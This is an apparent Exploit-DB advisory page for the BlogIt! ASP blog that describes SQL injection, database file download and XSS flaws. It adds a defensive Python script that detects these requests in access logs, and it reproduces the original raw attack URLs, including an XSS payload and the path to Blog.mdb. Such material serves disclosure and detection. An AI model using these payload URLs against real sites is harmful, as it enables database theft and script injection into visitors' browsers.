Vendor: BlogIt!
By: Pouya_Server
CVSS: 7.5 (HIGH)
Vulnerability: SQL/DD/XSS
CWE: 89, 22, 79
Product Name: BlogIt!
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

BlogIt! Vulnerabilities

The BlogIt! application is vulnerable to SQL injection, directory traversal and XSS attacks. An attacker can exploit the SQL injection vulnerability by sending malicious SQL queries to the vulnerable parameter 'day' in the 'index.asp' page. The directory traversal vulnerability can be exploited by accessing the 'Blog.mdb' file in the 'database' directory. The XSS vulnerability can be exploited by sending malicious JavaScript code to the 'view' parameter in the 'index.asp' page.

Mitigation:

Input validation should be used to prevent SQL injection, directory traversal and XSS attacks.
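
As an added example (not part of the original advisory or of BlogIt! itself), the same validation rules can be run as a detection pass over web server access logs: the date parameters must be numeric, 'view' must be a plain identifier, and any request for an .mdb file is flagged. The /blog path, the log format and the identifier rule for 'view' are assumptions; the log lines are constructed from the URL shapes in the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request target inside a common/combined-format access-log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
NUMERIC_PARAMS = ("day", "month", "year")   # date parts seen in the advisory's URLs
DIGITS = re.compile(r"[0-9]{1,4}")
VIEW_OK = re.compile(r"[A-Za-z0-9_]+")      # assumption: view names are plain identifiers


def findings(log_line):
    """Return a sorted list of rule names matched by one access-log line."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    path = url.path.lower()
    hits = set()
    if path.endswith(".mdb"):
        # The Access database should never be served over HTTP.
        hits.add("database-download")
    if path.endswith("/index.asp"):
        params = parse_qs(url.query, keep_blank_values=True)  # also URL-decodes
        for name in NUMERIC_PARAMS:
            if any(not DIGITS.fullmatch(v) for v in params.get(name, [])):
                hits.add("non-numeric-" + name)
        if any(not VIEW_OK.fullmatch(v) for v in params.get("view", [])):
            hits.add("unexpected-view")
    return sorted(hits)


# Constructed sample log lines; /blog stands in for [Path].
LINE = '203.0.113.5 - - [16/Jan/2009:10:00:00 +0000] "GET {} HTTP/1.1" 200 512'
TARGETS = [
    "/blog/index.asp?view=archive&day=1&month=12&year=2008",
    "/blog/index.asp?view=archive&day=1%27&month=12&year=2008",
    "/blog/database/Blog.mdb",
    "/blog/index.asp?view='+style='background:url(JaVaScRiPt:alert(1369))'"
    "+invalidparam='&day=1&month=12&year=2008",
]
SAMPLE_LOG = [LINE.format(t) for t in TARGETS]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(findings(line), line.split('"')[1])
```
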

Exploit-DB raw data:

#########################################################
---------------------------------------------------------
Portal Name: BlogIt!
Download : http://www.katywhitton.com/downloads/BlogIt!/BlogItDL.zip
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (SQL/DD/XSS)
---------------------------------------------------------
#########################################################
[SQL]:
http://site.com/[Path]/index.asp?view=archive&day=[SQL]
[DD]:
http://site.com/[Path]/database/Blog.mdb
[XSS]:
http://site.com/[Path]/index.asp?view='+style='background:url(JaVaScRiPt:alert(1369))'+invalidparam='&day=1&month=12&year=2008
---------------------------------

# milw0rm.com [2009-01-16]